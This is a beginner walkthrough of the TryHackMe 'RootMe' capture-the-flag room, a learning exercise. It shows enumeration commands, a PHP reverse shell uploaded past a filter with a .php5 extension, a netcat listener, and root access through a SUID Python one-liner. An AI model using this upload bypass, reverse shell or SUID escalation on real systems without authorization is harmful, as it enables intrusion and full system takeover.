Papadope Course
EN | ΕΛ

RootMe - TryHackMe Walkthrough

RootMe - TryHackMe Walkthrough

A beginner-friendly boot2root machine covering web enumeration, file upload bypass, reverse shell exploitation, and privilege escalation via a SUID Python binary.

Room URL: https://tryhackme.com/room/rootme

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • Gobuster
  • PHP reverse shell
  • File upload filter bypass
  • Netcat (reverse shell listener)
  • SUID exploitation (Python)
  • GTFOBins

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port Service Notes
22 SSH OpenSSH 7.6p1
80 HTTP Apache 2.4.29 (Ubuntu)

2. Web Directory Enumeration

Use Gobuster to discover hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key findings:

  • /panel — File upload page
  • /uploads — Directory where uploaded files are stored

3. File Upload Exploitation

Navigate to http://<TARGET_IP>/panel/ — you'll find a file upload form.

Prepare a PHP Reverse Shell

Use the pentestmonkey PHP reverse shell or create your own. Update the IP and port:

$ip = '<YOUR_IP>';
$port = 4444;

Bypass the Filter

The upload form blocks .php files. Bypass using an alternative PHP extension:

  • Rename your shell to shell.php5 (or try .phtml, .php4, .phar)

Start a Listener

On your machine:

nc -lvnp 4444

Upload and Trigger

  1. Upload the renamed shell via /panel
  2. Navigate to http://<TARGET_IP>/uploads/shell.php5
  3. You should receive a reverse shell as www-data

4. User Flag

Find the user flag:

find / -name "user.txt" 2>/dev/null
cat /var/www/user.txt

5. Privilege Escalation

Find SUID Binaries

Search for binaries with the SUID bit set:

find / -user root -perm /4000 2>/dev/null

Key finding: /usr/bin/python has the SUID bit set.

Exploit SUID Python

Use GTFOBins technique to escalate to root:

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Verify:

whoami
# root

6. Root Flag

Collect the root flag:

cat /root/root.txt

Notes

  • Redact any real passwords/flags if publishing publicly.
  • Key takeaways:
    • File upload filters can often be bypassed with alternative extensions
    • SUID binaries are a common privilege escalation vector
    • Always check GTFOBins for exploitation techniques on SUID binaries
Previous Pickle Rick - TryHackMe Walkthrough Next Simple CTF - TryHackMe Walkthrough